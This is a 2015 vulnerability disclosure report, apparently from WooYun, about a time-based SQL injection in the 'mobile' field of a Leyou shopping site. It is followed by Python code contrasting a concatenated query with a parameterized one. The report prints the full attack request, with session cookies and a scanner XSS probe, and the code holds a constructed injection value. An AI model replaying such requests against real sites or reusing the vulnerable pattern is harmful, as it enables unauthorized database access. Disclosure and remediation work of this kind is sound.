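2015-11-03: Details reported to the vendor; awaiting vendor handling
2015-11-08: The vendor actively ignored the vulnerability; details disclosed to the public
POST-based SQL injection on a Leyou site (time-based injection)
1. A Leyou site has a POST-based SQL injection. The POST request is as follows: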
POST /wish_list/searcherror HTTP/1.1
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://image.leyou.com.cn
Cookie: LYB2cSess=c7823737789a8556000c7fd2b9d40f66; PHPSESSID=11905b6fb0d52efd03a21d5f8f796064; LYProdListPage=http%3A%2F%2Fwww.leyou.com%2Fproduct%2Fage_i%2F0%3FLY_Category%3D24%26LY_Order%3Dsale_price; LY_CODE_SESS=9b6fe4d3a5495602; LY_PC=907610d0fb0f7af0c1da65256b8e9fb0; __ozlvd1400=1445967796; returnUrl=; ykss=7d8a2f5690d2ad9522bb6c17; __ptmid=a6f4f176-1c14-473a-a80f-a60838cb59f0; bdshare_firstime=1445958530877; BAIDUID=65323EB3872A7160250D09A35ACDE496:FG=1; OZ_1U_1400=vid=v62f95263f303b.0&ctime=1445958949&ltime=0; OZ_1Y_1400=erefer=http%3A//www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29&eurl=http%3A//image.leyou.com.cn/user/register.php&etime=1445958949&ctime=1445958949&ltime=0&compid=1400; single_bombBox=%u6FB3%u95E8%u7279%u522B%u884C%u653F%u533A-%u79BB%u5C9B; bombBox_addrid=820000; OZ_0J_1400=DIV*AD_YD_carttj*1445959205&DIV*AD_YD_carttj*1445959206; OZ_0a_1400=AD_YD_carttj*1445959205*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%23%23%232*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%23%23%231&AD_YD_carttj*1445959206*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%23%23%231*http%3A//image.leyou.com.cn/purchase/cart%3FimgUpdate1_x%3D1%26%231
Host: image.leyou.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

button=GO&email=sample%40email.tst&email_name=%d4%da%b4%cb%ca%e4%c8%eb%c4%fa%b5%c4%c3%fb%d7%d6&mobile=*
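2. The mobile parameter is the problem:
3. 52 databases:
4. It is time-based and very slow, so just retrieving the current user:
Severity: No impact, ignored by vendor
Ignored at: 2015-11-08 14:36
Vulnerability Rank: 4 (WooYun rating)
2015-11-19: Thanks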
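
The report shows that the mobile POST field reaches the database as SQL text. The sketch below is an added example, not code from the report or from the site (whose backend is not shown); it contrasts a concatenated query with allow-list validation plus a bound parameter. The table `wish_error`, the function names and `delay_marker` are hypothetical, the mobile format is an assumption, and SQLite stands in for the real database.

```python
import re
import sqlite3

# Assumption: 11-digit mobile numbers starting with 1; adapt to the real format.
MOBILE_RE = re.compile(r"1\d{10}")
# Constructed hostile value: closes the string literal and appends an expression.
HOSTILE = "x' OR delay_marker() OR '1'='2"

def open_db(calls):
    """In-memory stand-in; the table name and schema are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wish_error (email TEXT, email_name TEXT, mobile TEXT)")
    db.execute("INSERT INTO wish_error VALUES ('a@example.test', 'A', '13800000000')")

    def marker():
        # Harmless substitute for a delay function: records that the database
        # evaluated an expression that came from the request.
        calls.append("evaluated")
        return 0

    db.create_function("delay_marker", 0, marker)
    return db

def lookup_vulnerable(db, mobile):
    """'Before': the POST value is concatenated into the SQL text."""
    sql = "SELECT email FROM wish_error WHERE mobile = '" + mobile + "'"
    return db.execute(sql).fetchall()

def lookup_hardened(db, mobile):
    """'After': allow-list validation, then a bound parameter."""
    if not MOBILE_RE.fullmatch(mobile):
        raise ValueError("mobile must be an 11-digit number")
    sql = "SELECT email FROM wish_error WHERE mobile = ?"
    return db.execute(sql, (mobile,)).fetchall()

def demo():
    """Return how often the injected expression ran in each variant."""
    calls = []
    db = open_db(calls)
    lookup_vulnerable(db, HOSTILE)
    ran_when_concatenated = len(calls)
    calls.clear()
    try:
        lookup_hardened(db, HOSTILE)
    except ValueError:
        pass  # rejected before any SQL is built
    # Binding alone also keeps the value as data, even without validation.
    db.execute("SELECT email FROM wish_error WHERE mobile = ?", (HOSTILE,)).fetchall()
    return ran_when_concatenated, len(calls)
```

`demo()` returns a non-zero count for the concatenated query and zero for the hardened path, which is the property that removes the delay side channel the report relied on.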